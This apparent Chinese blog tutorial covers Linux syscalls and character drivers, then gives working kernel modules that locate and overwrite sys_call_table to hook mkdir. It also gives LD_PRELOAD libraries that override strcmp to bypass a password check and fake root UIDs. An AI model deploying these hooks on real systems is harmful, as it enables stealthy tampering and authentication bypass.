五、Openwrt Linux 嵌入式驱动系统调用

最新推荐文章于 2022-10-20 11:12:43 发布
最新推荐文章于 2022-10-20 11:12:43 发布
阅读量559 收藏
点赞数
分类专栏: openwrt开发
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43789722/article/details/103124133
版权

Linux 系统调用结构

  • 0.11内核文件里 的 kernel.h 里
  • 系统调用号 -->是sys_call_table[]—>执行不同的 sys_…
  • 特点一 :系统调用就像快递员 ,只传送命令 ,不实现相关命令,接口
  • 特点二 : 回调用VFS进行分类

字符设备驱动

  • 内核 的对象为 struct cdev
  • 每个字符 设备驱动都有 主设备号 从设备号
  • 主设备号 :类型---从内核中找到对应的cdev对象链表

在这里插入图片描述

  • 从设备号 :该类型下具体哪个设备

在这里插入图片描述

  1. 首先调用应用层的 read/write/open 时
    它的请求会传到标准C库里去
  2. 标准C库接收到这些请求后,根据当前调用的函数会调用不同的号,根据号来调用不同的系统调用
  3. 系统调用 只进行传送,不会做任何的实现,传给VFS 虚拟文件系统
  4. VFS 根据当前需要调用的fd 的类型来进行分类,比如是字符设备驱动
  5. 字符设备驱动 会根据当前的主设备号来找到调用哪个对象,找到对象后 根据从设备号找到对象里的 调用哪个 file_operations ,调用file_operations 来找 到里的read ,因为 read 与 uart_read 相连接,再 找到外部的uart硬件
  • 如何写驱动?
  • 首先分配 file_operations
static const struct file_operations ad1889_fops = {
	.owner	= THIS_MOUDLE,
	.llseek	= no_llseek,
	.read	= ad1889_read,
	.write	= ad1889_write,
	.poll	= ad1889_poll,
	.ioctl	= ad1889_ioctl,
	.mmap	= ad1889_mmap,
	.open	= ad1889_open,
	.relaeae= ad1889_release;
};
  • 一、劫持系统中用于读取文件列表的系统调用
  • 1.先寻找内核内存中系统调用表的内存地址sys_call_table,调换该内存中某个函数地址,实现劫持函数的调用—>实现某个真正系统调用的实现
    在这里插入图片描述
  • 2.如何实现 sys_call_table 地址的搜索
    1.通过部分系统文件 :/boot/System.map-4.15.0-xx-generic, 要用root权限进去查看
    在这里插入图片描述
  • 这些为部分系统调用的函数地址
    在这里插入图片描述
    在这里插入图片描述
  • 下面对 sys_call_table 的地址 进行修改
  • 首先创建 sys_map_addr.h 写下 sys_call_table 的地址
#define SYS_CALL_TABLE  0xffffffff818001c0
//该值在每次启动都不一样,因为有地址随机化
  • 在 lkm2.c 对内核进行相关的操作
/*lkm2.c*/

#include <linux/init.h>
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/errno.h>
#include <linux/types.h>
#include <linux/unistd.h>
#include <linux/sched.h>
#include <linux/kallsyms.h>
#include <asm/cacheflush.h>
#include <asm/page.h>
#include <asm/current.h>


#include "sys_map_addr.h"

unsigned long **sys_call_table = (unsigned long **) SYS_CALL_TABLE; //锁定sys_call_table,把从头文件sys_map_addr.h的地址赋给 当前函数

asmlinkage long (*real_mkdir)(const char __user *pathname,umode_t mode);
// 假的要模拟 真的函数一样写


asmlinkage long fake_mkdir(const char __user *pathname, umode_t mode)
{
	printk("mkdir-%s\n", pathname);
	if(NULL==strstr(pathname,"book"))//比较当前创建的目录是否 有book 的名字,如果有 ,return 0,否则创建
    {
        return (*real_mkdir)(pathname, mode);
    }
    else
    {
        return 0;
    }   
}



static int lkm_init(void)
{
    /*打开内核内存写保护*/
	write_cr0(read_cr0() & (~0x10000));
    //保存系统原有的系统调用接口函数
	real_mkdir = (void *)sys_call_table[__NR_mkdir];//2.6版本为__NR_mkdir
    //替换原有系统调用地址
    //__NR_mkdir的值是系统 unist.h 所对应的
    //要找到对应版本号的内核 所对应宏定义的值进行修改
	sys_call_table[__NR_mkdir] = fake_mkdir;
    /*关闭内核内存写保护*/
	write_cr0(read_cr0() | 0x10000);
	//告诉用户模块已经加载
	printk("book:module loaded\n");

	return 0;
}

//出口函数 要还原之前的值
static void lkm_exit(void)
{
	//关闭写保护
	write_cr0(read_cr0() & (~0x10000));	
	//还原原来真正的函数
	sys_call_table[__NR_mkdir] = real_mkdir;
	//开启写保护
	write_cr0(read_cr0() | 0x10000);
	//告诉用户模块已经移除
	printk("book:module removed\n");
}

module_init(lkm_init);
module_exit(lkm_exit);
MODULE_LICENSE("GPL");
MODULE_AUTHOR("book");
MODULE_DESCRIPTION("hook mkdir");

  • unist.h
    在这里插入图片描述

  • make
    在这里插入图片描述

  • 加载内核模块 insmod lkm2.ko

  • dmesg -c 查询
    在这里插入图片描述

  • 测试 是否能创建 book 文件夹,不能
    在这里插入图片描述

  • 在过一会后,系统崩溃了

  • 测试 能不能建 其他文件夹时,系统崩溃了

  • 2.在内存中进行特征搜索,找到sys_call_table的内存地址
    PAGE_OFFSET 内核内存空间的起始地址
    sys_close函数是导出 (sys_open sys_read没有导出),所以可以获取该函数的地址
    sys_close 和sys_call_table 在同一个内存区间

  • sys_call_table.c

#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/init.h>
#include <linux/memblock.h>
#include <asm/page.h>
#include <asm/cacheflush.h>
#include <linux/fs.h>
#include <linux/proc_fs.h>
#include <linux/seq_file.h>
#include <linux/printk.h>
#include <linux/dirent.h>
#include <linux/kernel.h>
#include <linux/syscalls.h>
#include <linux/fs.h>
#include <linux/minix_fs.h>
#include <linux/ext2_fs.h>
#include <linux/romfs_fs.h>
#include <uapi/linux/cramfs_fs.h>
#include <linux/initrd.h>
#include <linux/string.h>
#include <linux/slab.h>
#include <linux/decompress/generic.h>


MODULE_LICENSE("GPL");

unsigned long **real_sys_call_table;


static unsigned long ** get_sct_via_sys_close(void)
{
    unsigned long **entry = (unsigned long **)PAGE_OFFSET;

    for (;(unsigned long)entry < ULONG_MAX; entry += 1) {
        if (entry[__NR_close] == (unsigned long *)sys_close) {
            return entry;
        }
    }
    return NULL;
}

static unsigned long ** get_sct(void)
{
    return get_sct_via_sys_close();
}


static int __init init_sys_call_memory(void)
{

    real_sys_call_table = get_sct();
    printk("PAGE_OFFSET = %lx\n", PAGE_OFFSET);
    printk("sys_call_table = %p\n", real_sys_call_table);
    printk("sys_call_table - PAGE_OFFSET = %lu MiB\n",
             ((unsigned long)real_sys_call_table -
              (unsigned long)PAGE_OFFSET) / 1024 / 1024);
    return 0;
}


static void __exit exit_sys_call_memory(void)
{
    printk("%s\n", "Farewell the World!");
    return;
}

module_init(init_sys_call_memory);
module_exit(exit_sys_call_memory);
MODULE_LICENSE("GPL");
MODULE_AUTHOR("book");
MODULE_DESCRIPTION("hook mkdir");

  • 加载
    在这里插入图片描述

  • 3.通过 IDT 表

  • 4.系统硬编码寻找

  • Makefile --IDT表

KVERS = $(shell uname -r)

# Kernel modules
obj-m += lkm3.o

# Specify flags for the module compilation.
#EXTRA_CFLAGS=-g -O0

build: kernel_modules

kernel_modules:
	make -C /lib/modules/$(KVERS)/build M=$(CURDIR) modules

clean:
	make -C /lib/modules/$(KVERS)/build M=$(CURDIR) clean
  • lkm3.c
/*lkm3.c*/

#include <linux/init.h>
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/errno.h>
#include <linux/types.h>
#include <linux/unistd.h>
#include <linux/sched.h>
#include <linux/kallsyms.h>
#include <asm/cacheflush.h>
#include <asm/page.h>
#include <asm/current.h>

	
unsigned long *sys_call_table;

struct 
{
	unsigned short size;
	unsigned int addr;
}__attribute__((packed)) idtr;

struct
{
	unsigned short offset_1;
	unsigned short selector;
	unsigned char zero;
	unsigned char type_attr;
	unsigned short offset_2;
}__attribute__((packed)) idt;

unsigned long  *find_sys_call_table(void)
{
	unsigned int sys_call_off;
	char *p;
	int i;
	unsigned int ret;

	asm("sidt %0":"=m"(idtr));
	printk("Arciryas:idt table-0x%x\n", idtr.addr);
// 之所以是 0x80是因为是sys_call的地址
	memcpy(&idt, idtr.addr+8*0x80, sizeof(idt));
	sys_call_off = ((idt.offset_2<<16) | idt.offset_1);

	p = sys_call_off;
	
//找硬编码
	for(i=0; i<100; i++)
	{
		if(p[i]=='\xff' && p[i+1]=='\x14' && p[i+2]=='\x85')
			ret = *(unsigned int *)(p+i+3);
	}
	printk("Arciryas:sys_call_table-0x%x\n", ret);
	return (unsigned long**)ret;
}

asmlinkage long (*real_mkdir)(const char __user *pathname,
				umode_t mode);
asmlinkage long fake_mkdir(const char __user *pathname, umode_t mode)
{
	printk("Arciryas:mkdir-%s\n", pathname);
	
	return (*real_mkdir)(pathname, mode);
}

static int lkm_init(void)
{
	sys_call_table = find_sys_call_table();

	write_cr0(read_cr0() & (~0x10000));
	real_mkdir = (void *)sys_call_table[__NR_mkdir];
	sys_call_table[__NR_mkdir] = fake_mkdir;
	write_cr0(read_cr0() | 0x10000);

	printk("Arciryas:module loaded\n");

	return 0;
}

static void lkm_exit(void)
{
	write_cr0(read_cr0() & (~0x10000));	
	sys_call_table[__NR_mkdir] = real_mkdir;
	write_cr0(read_cr0() | 0x10000);
	printk("Arciryas:module removed\n");
}

module_init(lkm_init);
module_exit(lkm_exit);
MODULE_LICENSE("GPL");
MODULE_AUTHOR("book");
MODULE_DESCRIPTION("hook mkdir");

  • 通过找到call 来追踪 sys_call_table 从0.11内核文件得知
    在这里插入图片描述
    在这里插入图片描述

  • 系统调用的各个节点
    int 0x80
    触发SWI中断异常
    idt(系统中断异常向量表) 表中找到 0x80 中断对应的中断处理函数
    syscall
    call sys_call_table eax(nr_syscall)
    sys_read
    file
    file_operations
    .read

  • 二、劫持文件系统的库函数,实现对于文件的隐藏

用个preload 预加载库机制进行
preload 用来调试等功能,主要来在所有库加载之前, 加载用一个 preload 指定的库

  • 例子
  • pass.c文件
#include <stdio.h>
#include <string.h>

int main(int argc,char*argv[])
{
	char passwd[]="SWITCH";
	if(argc<2)
	{
		printf("usage:%s<password>\n",argv[0]);
		return ;
	}
	if(!strcmp(passwd,argv[1]))
	{
		printf("Welcome into process!\n");
		return;	
	}
	printf("Error password!\n");
	
}
  • 对 pass.c进行编译
    在这里插入图片描述
  • ldd pass (ldd 是用来追寻某个程序它所使用的的动态库)
    在这里插入图片描述
  • 如果执行 pass 程序 的密码不对是不能进去的
  • 对了才能进去
  • 在这里插入图片描述
  • 假如我们不知道 密码 ,应从preload 入手,在调用原本要加载的库之前,把自己写的库预加载进去

parook.c 文件

#include <stdio.h>
#include <string.h>


int strcmp(const char *s1,const char *s2)
{
	printf("password = <%s>\n",s1);
	return 0;
}
  • 1.编写注入劫持函数,并编译成动态链接库
  • gcc -fPIC -shared parock.c -o libmycmp.so
    在这里插入图片描述
  • 先看看未预加载的 pass 的库使用情况
    在这里插入图片描述
  • 切换root权限/不切也可以
  • export LD_PRELOAD = 绝对路径+预加载库名.so
    在这里插入图片描述
  • 此时 ./pass +密码 试验 任意密码是否能进入
  • 成功
    在这里插入图片描述
  • 卸载预加载库
  • 在这里插入图片描述
    在这里插入图片描述
  • 怎么防止别人用这样的方法来实现进入?

在执行验证密码前,对库进行验证

  • 假如现在有 A, B软件, B软件执行需要A软件提供的 ID号来决定是否有效 ,可以从A软件给的值修改id值
  • rootkit.c 文件,无论返回的 id值是多少,都返回 0 的root权限
#include <dlfcn.h>
#include <unistd.h>
#include <sys/types.h>
uid_t geteuid(void){return 0;}
uid_t getuid(void){return 0;}
uid_t getgid(void){return 0;}

  • 生成 rootkit.so 文件
    在这里插入图片描述

  • 先查看当前的id值
    在这里插入图片描述

  • 预加载rootkit.so
    在这里插入图片描述

  • 再查看 此时 id ,已被修改成 0
    在这里插入图片描述

  • 卸载预加载 unset LD_PRELOAD,再查看id,已恢复
    之前的id值 在这里插入图片描述

  • 用 ldd 对比 预加载之前和之后的 库的调用情况

  • 预加载之前
    在这里插入图片描述

  • 预加载之后
    在这里插入图片描述

  • 之前都是修改整个系统的环境变量进行操作

  • 现在 对单个程序进行预加载
    *LD_PRELOAD=/home/book/NW/preload/libmycmp.so ./pass hello

  • 成功
    在这里插入图片描述

  • 怎么识别调用了哪些库文件

符号表

暴躁的河马
关注
专栏目录
OPENWRT MT7628 驱动移植WIFI折腾记
一座明亮的小塔
04-18 4407
本人所写的博客都为开发之中遇到问题记录的随笔,主要是给自己积累些问题。免日后无印象,如有不当之处敬请指正(欢迎进扣群 24849632 探讨问题); 我手上的MT7628开发板编译后,没有无线接口,检查menuconfig后,发现MT7628需要选中kmod-mt76 重新编译后可以在控制台看到无线接口 之前编译时候/etc/config/wireless是不存在的,选中kmod-...
全志V3S嵌入式驱动开发(spi-nand image制作)
最新发布
嵌入式-老费,一个分享专业嵌入式知识的blog
06-27 1019
【 声明:版权所有,欢迎转载,请勿用于商业用途。 联系信箱:feixiaoxing @163.com】 上一篇文章,我们说到了spi-nor image的制作和输入。相比较spi-nor,spi-nand虽然在稳定性上面差一点,但是价格上面有很大的优势。举例来说,一般32M的spi-nor大约在6-7元左右,但是128M的spi-nand只需要3-4元,因此对于客户来说,哪怕实际产品中有一些简单的视频和音频文件,只要使用的是spi-nand,实际使用中也没有多大的关系。
Linux驱动之文件操作系统调用
Deren_lin的博客
08-31 934
1.1 文件操作系统调用       Linux的文件操作系统调用涉及创建,打开,读取和关闭文件。      1.1.1 创建 int creat(const char *filename, mode_t mode);              参数mode指定新建文件的存取权限,它同umask一起决定文件的最终权限(mode &amp; umask),其中umask代表了文件在创建时需...
嵌入式Linux 驱动编译到内核
cyd411的专栏
04-19 227
原文地址:https://www.cnblogs.com/embInn/p/14038119.html 原作者写的很好,我在移植的时候,借鉴了里面内容,我的内核是linux-3.14.38,添加驱动前,我是提前编译过了一次, 下面是简单的驱动代码 hello.c #include <linux/module.h> #include <linux/init.h> MODULE_LICENSE("Dual BSD/GPL"); static int hello_init(voi
OpenWRT(八)应用层开发
嵌入式软件开发交流
01-29 2万+
一、应用层和kernel层很多人都是学习完单片机后才开始学嵌入式Linux的,刚开始学时都不能理解为什么写两个程序才能点亮LED,以前单片机只要写一个程序进去LED就可以控制了啊?这就是操作系统带来的分层思想。其实我们也可以直接驱动直接控制,但是这就失去了操作系统的意义了。驱动程序是在kernel层,应用程序是在应用层。两者关系: 应用——》驱动调用驱动去操作底层硬件)二、应用程序实例用例
openwrt 编译外部源码 过程与问题解决
sfdgfdvc的博客
08-08 3033
1、openwrt 基本介绍 openwrt 是一个编译工具,帮助自定义编译内核和应用(我的理解)。所以如果有定制自己需要的内核,并基于这个定制化内核编译一些应用的话,可以使用openwrtopenwrt 还是很成熟,很方便的。 (PS:最开始不知道openwrt的时候,我是自己配置编译环境,然后自己编译应用,当然是很复杂的,又要应用和内核版本一致,又有各种规范,一个OVS编了好久才编好;而使用openwrt ,只需要勾选上自己想要的应用就可以了(openwrt 应用源中的应用很多,基本满足我的需求)
Linux驱动开发常用头文件
zjydg1101的博客
04-21 237
#include <linux/module.h> #include <linux/types.h> #include <linux/fs.h> #include <linux/errno.h> #include <linux/mm.h> #include <linux/sched.h> #include <linux/...
SR9700 Linux系统驱动
07-25
《SR9700 Linux系统驱动详解》 在嵌入式和物联网领域,Linux系统以其开源、稳定和可定制性而备受青睐。SR9700芯片作为一款高性能的处理器,广泛应用于各种智能设备中。要使这些设备正常运行,就需要适配相应的Linux...
2.openwrt 驱动开发源码(字符设备)
10-19
OpenWRT是一个轻量级的嵌入式Linux发行版,广泛应用于路由器和其他嵌入式设备。它提供了丰富的工具和库,使得开发者能够定制和优化设备的功能。本文将深入探讨在OpenWRT中进行字符设备驱动开发的相关知识点。 首先...
嵌入式Linux操作系统
05-22
常见的嵌入式Linux发行版有Yocto Project、OpenWRT、 BusyBox等,它们提供了构建嵌入式系统的工具和框架。 嵌入式Linux操作系统与传统的桌面或服务器Linux相比,更强调实时性、低功耗和小体积。开发者可以利用丰富...
超详细!手把手演示编译OpenWrt内核驱动模块
董哥的黑板报
10-26 1万+
前言: 构建自己的内核驱动模块,相关知识可以参考OpenWrt软件编译构建系统文章:https://blog.csdn.net/qq_41453285/article/details/102545605 下面我们自己以一个自己设计的hello-kernel内核驱动模块为例,一步一步地构建出自己的驱动模块 一、目录结构 通常新增一 个内核驱动模块的主要步骤如下: 在OPenWrt源码的pa...
ubuntu 10.10 添加系统调用的方法
weixin_30655569的博客
03-09 131
主要参考以下文章 向linux内核中添加三个系统调用(Ubuntu9.10) - 耕耘--IT - 博客园 内核编译的过程(网上收集) - 小楠楠 - 博客大巴 编译内核(2.6.11)_儒雅_百度空间 向Linux内核添加系统调用函数_百度文库 Ubuntu 10.04 编译安装最新版本Linux-2.6.34内核...
linux内核系统调用hook
weixin_33712881的博客
07-10 151
我以前利用0x80中断程序找到system_call然后找到 sys_call_table的方法,现在试下hook系统调用sys_mkdir来阻止创建目录小试牛刀。 #include <linux/init.h> #include <linux/module.h> #include <linux/moduleparam.h> #...
ioctl系统调用流程
雜貨鋪
07-24 2224
原文地址:http://blog.sina.com.cn/s/blog_60692ff60100ecd2.html   一、系统调用框架 与系统调用相关的数据结构和函数 系统调用函数名以“sys_”开头,后面是该系统调用的名字,由此构成了sys_name()这样的函数名。在include/asm/unistd.h中不同的体系结构为每一个系统调用定义了惟一的编号,假设用name来表示系统
Linux网站攻防演练常用操作实践
企业实战系列集 ●●● https://ximenjianxue.blog.csdn.net
09-19 6115
项目背景 因适逢国家重大节日,诸如即将到来的70周年国庆阅兵,企业要求对公司各业务进行攻防演练,自查自纠,确保重保期间业务正常运转;各部门需要提前进行安全演练,加强和锻炼网络安全防控意识和应急处置能力。 演练检查项(针对Linux) 2.1)黑客入侵 当发生黑客入侵、系统崩溃,网页篡改,主机宕机或其它影响业务正常运行的安全事件时,急需第一时间响应处理,第一时间应急响应切断危害,及时确保业务系统在最...
Linux中基于eBPF的恶意利用与检测机制(rootkit、驱动
墨痕诉清风的博客
03-10 1663
前言 近几年来,云原生领域飞速发展,k8s成为公认的云操作系统。容器的高频率部署、短暂的生命周期、复杂的网络路由,都给内核带来了新的挑战。系统内核在面对复杂性不断增长,性能、可扩展性新需求的同时,还需要保障系统稳定可用,这是极其困难的事情。 eBPF出现,以较小的子系统改动,保障了系统内核的稳定。具备实时动态加载的特性,将业务逻辑加载到内核,实现热更新的动态执行。eBPF技术的出现,衍生新业务场景的同时,也带来了安全威胁。 现状分析 在解决很多技术难题的同时,eBPF技术的出现也带来了新的恶意利用
linux 获取机器码_linux的so注入与热更新原理 | 直播回顾
weixin_40001245的博客
01-31 839
关注腾讯云大学,了解行业最新技术动态 腾讯云大学知识分享月已经开幕了为了让大家沉淀知识,我们邀请了赵昕讲师将直播内容整理成了文章话不多说让我们再来回顾一下课程内容吧直 播 回 顾简介动态链接库(SO文件)在Linux中使用非常广泛,对于后台开发来说,服务器进程往往加载和使用了很多的SO文件,当需要更新某个SO时往往需要重启进程。本课程将讲述如何做到不重启进程,而将so的修改热更新生...
Linux后渗透--权限维持十式(附检测及清除手段)
weixin_44155363的博客
06-15 2556
0x01:SSH 一、ssh软连接 SSH软连接后门的原理 1、Linux软连接ssh后门需要ssh配置允许PAM认证才能使用 2、将sshd文件软连接名称设置为su,这样应用在启动过程中他会去PAM配置文件夹中寻找是否存在对应名称的配置信息(su) 3、如果被控主机不允许root登陆可用其他已存在用户登陆 4、通过软连接的方式,实质上PAM认证是通过软连接的文件名(如:/tmp/su,/home/su)在/etc/pam.d/目录下寻找对应的PAM配置文件(如:/etc/pam.d/su) 5、任意密码登
内存取证-volatility工具的使用 (史上更全教程,更全命令)
热门推荐
路baby的博客
10-20 7万+
内存取证-volatility工具的使用 (史上更全教程,更全命令) 安装步骤 命令解析 工具插件分析 例题讲解
OpenWrt嵌入式Linux发行版安装与配置指南
"该资源主要介绍了如何安装和配置OpenWrtOpenWrt是一个嵌入式Linux发行版,常用于路由器固件,提供了高度可定制的系统。文章内容包括OpenWrt的基础安装、配置以及高级设置,同时也涉及开发、调试和错误报告等...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值